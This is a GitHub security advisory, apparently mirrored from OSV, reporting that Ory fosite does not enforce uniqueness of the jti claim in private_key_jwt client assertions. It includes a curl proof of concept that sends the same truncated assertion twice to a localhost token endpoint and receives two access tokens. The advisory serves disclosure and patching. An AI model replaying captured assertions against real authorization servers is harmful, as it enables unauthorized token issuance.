GHSA-v3q9-2p3m-7g43

Source
https://github.com/advisories/GHSA-v3q9-2p3m-7g43
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-v3q9-2p3m-7g43/GHSA-v3q9-2p3m-7g43.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-v3q9-2p3m-7g43
Published
2021-05-24T16:57:52Z
Modified
2024-05-19T02:24:27.584711Z
Severity
  • 8.1 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
Summary
Token reuse in Ory fosite
Details

Impact

When using the client authentication method "private_key_jwt" [1], the OpenID specification says the following about the assertion jti:

A unique identifier for the token, which can be used to prevent reuse of the token. These tokens MUST only be used once, unless conditions for reuse were negotiated between the parties

Hydra does not seem to check the uniqueness of this jti value. Here is me sending the same token request twice, hence with the same jti assertion, and getting two access tokens:

$ curl --insecure --location --request POST 'https://localhost/_/oauth2/token' \
   --header 'Content-Type: application/x-www-form-urlencoded' \
   --data-urlencode 'grant_type=client_credentials' \
   --data-urlencode 'client_id=c001d00d-5ecc-beef-ca4e-b00b1e54a111' \
   --data-urlencode 'scope=application openid' \
   --data-urlencode 'client_assertion_type=urn:ietf:params:oauth:client-assertion-type:jwt-bearer' \
   --data-urlencode 'client_assertion=eyJhb [...] jTw'
{"access_token":"zeG0NoqOtlACl8q5J6A-TIsNegQRRUzqLZaYrQtoBZQ.VR6iUcJQYp3u_j7pwvL7YtPqGhtyQe5OhnBE2KCp5pM","expires_in":3599,"scope":"application openid","token_type":"bearer"}
$ curl --insecure --location --request POST 'https://localhost/_/oauth2/token' \
   --header 'Content-Type: application/x-www-form-urlencoded' \
   --data-urlencode 'grant_type=client_credentials' \
   --data-urlencode 'client_id=c001d00d-5ecc-beef-ca4e-b00b1e54a111' \
   --data-urlencode 'scope=application openid' \
   --data-urlencode 'client_assertion_type=urn:ietf:params:oauth:client-assertion-type:jwt-bearer' \
   --data-urlencode 'client_assertion=eyJhb [...] jTw'
{"access_token":"wOYtgCLxLXlELORrwZlmeiqqMQ4kRzV-STU2_Sollas.mwlQGCZWXN7G2IoegUe1P0Vw5iGoKrkOzOaplhMSjm4","expires_in":3599,"scope":"application openid","token_type":"bearer"}

Patches

This issue is patched in 0.31.0.

Workarounds

Do not allow clients to use private_key_jwt.

References

https://openid.net/specs/openid-connect-core-1_0.html#ClientAuthentication

Database specific
{
    "nvd_published_at": "2020-09-24T17:15:00Z",
    "severity": "HIGH",
    "github_reviewed_at": "2021-05-24T12:52:00Z",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-287",
        "CWE-345"
    ]
}

Affected packages

Go / github.com/ory/fosite

Package

Name
github.com/ory/fosite
Purl
pkg:golang/github.com/ory/fosite

Affected ranges

Type
SEMVER
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
0.31.0